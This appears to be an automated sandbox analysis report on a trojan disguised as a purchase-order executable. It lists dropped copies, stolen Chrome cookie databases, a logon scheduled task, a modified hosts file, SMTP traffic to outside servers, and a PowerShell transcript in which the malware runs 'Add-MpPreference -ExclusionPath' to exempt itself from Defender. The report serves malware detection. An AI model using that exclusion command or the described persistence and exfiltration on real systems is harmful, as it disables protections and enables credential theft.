                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOtxvn:cge4MYrFdOFzOzN33ODOiDdKrsuT2v
                                                MD5:DD6C0EEF606D484E89572F935B1B7EED
                                                SHA1:D71106AE2D8342235032067DB310DCEA3D81BD7A
                                                SHA-256:C11F85855EE643320520D3E1B797B8CE460F8C019C37EDCC97E3EBCBDD931AFC
                                                SHA-512:1410D7AEA3AE9A66057F05B32B04E1F9A916F13E5CCD2A714A455900370D5F8A75DE4846786FDE270CCCDDB869197596F40B6B9ECB8F1E2497589822382EA46B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Roaming\NpPgfycY.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.

                                                C:\Users\user\AppData\Roaming\NpPgfycY.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Roaming\hsmpeuc1.fpe\Chrome\Default\Cookies

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):677888
                                                Entropy (8bit):7.7510737607081515
                                                Encrypted:false
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                MD5:152EF22896BF39197D210D40171E898A
                                                SHA1:BDD88E03D9131D7F35E0BFADBED02010D231A1BD
                                                SHA-256:5A3834895F08AFF701A029275074D4AB47AFF4951D6F75E8393B0A97CB8F6031
                                                SHA-512:B4648E8C09C4958D80C9F08801D9BD9E3E2651DD194A71DB30D9BA1C84EE448823F97C1550FBD476863046398CAE26E533AA504E7BB297DD53287F52A0D4C928
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 62%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@..................................n..K...................................*n............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B.................n......H......................h5...6...........................................~....(q...8.....(....8......~....(q...8.....*...0..m.......8".......E........8......*.~......8<....~.........8 ....s......... ....(....9....&8......9....8....8....8........0..........8........E....Q...........&.......w...........+...]...................8L....~.....o..... ....~....(u...o....8.....~.....o..... ....~....(u...o....8.....~.....s....o....8.....~.....o..... ...~....(u...o....8H...~.....s....o.

                                                C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Roaming\mtx2g3ud.n3c\Chrome\Default\Cookies

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:modified
                                                Size (bytes):20480
                                                Entropy (8bit):0.6970840431455908
                                                Encrypted:false
                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\Documents\20220514\PowerShell_transcript.035347.wvY4IpFB.20220514113643.txt

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5781
                                                Entropy (8bit):5.404314265626119
                                                Encrypted:false
                                                SSDEEP:96:BZ3haN1qDo1ZRZMhaN1qDo1ZyV/p3jZShaN1qDo1ZJmHHnZw:lf
                                                MD5:F99E986A7442F13FED06A4728EEF4F0A
                                                SHA1:BA02D7F433434035A407C6F404849D25C7F25408
                                                SHA-256:5EA7582B7E73D2F59CAF50E0254BC1D20B3D3F228D35FBEBAC6CB118D3E513FA
                                                SHA-512:94821D2FDE5A93181462F32EA12BAA61320817963E94315F7ED847D98F0E2F2A8936DE78248C4361CB7D090524CEBAB8A39701B40B9483EAAD7E3BC460244F15
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220514113644..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 035347 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220514113644..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..**********************..Windows PowerShell transcript start..Start time: 20220514113944..Username: computer\user..RunAs User: computer\user..C

                                                C:\Windows\System32\drivers\etc\hosts

                                                Download File
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):835
                                                Entropy (8bit):4.694294591169137
                                                Encrypted:false
                                                SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                MD5:6EB47C1CF858E25486E42440074917F2
                                                SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.7510737607081515
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Purchase order 450080088 proj. Allt Charnan.exe
                                                File size:677888
                                                MD5:152ef22896bf39197d210d40171e898a
                                                SHA1:bdd88e03d9131d7f35e0bfadbed02010d231a1bd
                                                SHA256:5a3834895f08aff701a029275074d4ab47aff4951d6f75e8393b0a97cb8f6031
                                                SHA512:b4648e8c09c4958d80c9f08801d9bd9e3e2651dd194a71db30d9ba1c84ee448823f97c1550fbd476863046398cae26e533aa504e7bb297dd53287f52a0d4c928
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                TLSH:67E4F13DF1F79E22C35D26B2C0C65A0443B44AAAA637E35B2B4581D59D03BF789887C7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4a6ece
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x627E0356 [Fri May 13 07:05:58 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa6e800x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x394.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa6e2a0x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xa4ed40xa5000False0.873976089015data7.75961172037IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rsrc0xa80000x3940x400False0.3779296875data2.89820511278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xaa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xa80580x33cdata

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Version Infos

                                                DescriptionData
                                                Translation0x0000 0x04b0
                                                LegalCopyrightCopyright 2017
                                                Assembly Version1.0.0.0
                                                InternalNameSZArrayEnumera.exe
                                                FileVersion1.0.0.0
                                                CompanyName
                                                LegalTrademarks
                                                Comments
                                                ProductNameResetEvent
                                                ProductVersion1.0.0.0
                                                FileDescriptionResetEvent
                                                OriginalFilenameSZArrayEnumera.exe

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 14, 2022 11:37:05.771193981 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:05.993397951 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:05.995455027 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:07.157839060 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:07.158174992 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:09.159976006 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:09.160301924 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:10.559385061 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.559766054 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:10.781893969 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.782027960 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:10.783271074 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.317747116 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.317868948 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.405200958 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.628443956 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.628912926 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:11.853620052 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:11.854393959 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.079016924 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.079271078 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.321695089 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.327233076 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.809250116 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:12.857587099 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:12.858903885 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:13.606168985 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.215701103 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.439024925 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:15.439127922 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:15.872628927 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:16.545691013 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:16.545902014 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:17.689683914 CEST58749747208.91.198.38192.168.2.3
                                                May 14, 2022 11:37:17.690489054 CEST49747587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:18.919081926 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:24.919596910 CEST49752587192.168.2.3208.91.198.38
                                                May 14, 2022 11:37:36.930541992 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:39.920793056 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:40.141374111 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:40.141472101 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:40.828701973 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:40.828891039 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.049647093 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.049762011 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.049993992 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.271897078 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.272609949 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:41.496193886 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:41.496411085 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.029009104 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:42.029138088 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.108721972 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.718844891 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:42.941464901 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:42.941850901 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:43.174514055 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:43.174971104 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:37:43.396542072 CEST58749752162.222.225.16192.168.2.3
                                                May 14, 2022 11:37:43.396626949 CEST49752587192.168.2.3162.222.225.16
                                                May 14, 2022 11:38:17.319211006 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:17.541548014 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:17.541661978 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:17.770459890 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:17.770930052 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:18.305701971 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:18.308371067 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:18.424050093 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:19.221009970 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:19.443434954 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:19.443476915 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:19.443802118 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:20.649733067 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:20.649828911 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:22.111876011 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.252902985 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.453726053 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.455028057 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.657000065 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.657284021 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:27.858243942 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:27.858702898 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:28.080161095 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:28.081532001 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:28.281615973 CEST58749823208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:28.281754971 CEST49823587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:31.937253952 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.137037992 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.137238026 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.531996012 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.535051107 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.734637022 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.734733105 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.735054970 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:32.935878038 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:32.936386108 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.138474941 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:33.191013098 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.435726881 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.637151957 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:33.637434006 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.848023891 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:33.894282103 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:33.995237112 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:34.196006060 CEST58749837208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:34.196283102 CEST49837587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:35.580670118 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:35.790086031 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:35.801145077 CEST58749838208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:35.801289082 CEST49838587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.010725021 CEST58749839208.91.198.38192.168.2.3
                                                May 14, 2022 11:38:36.010962009 CEST49839587192.168.2.3208.91.198.38
                                                May 14, 2022 11:38:36.027163982 CEST58749838208.91.198.38192.168.2.3
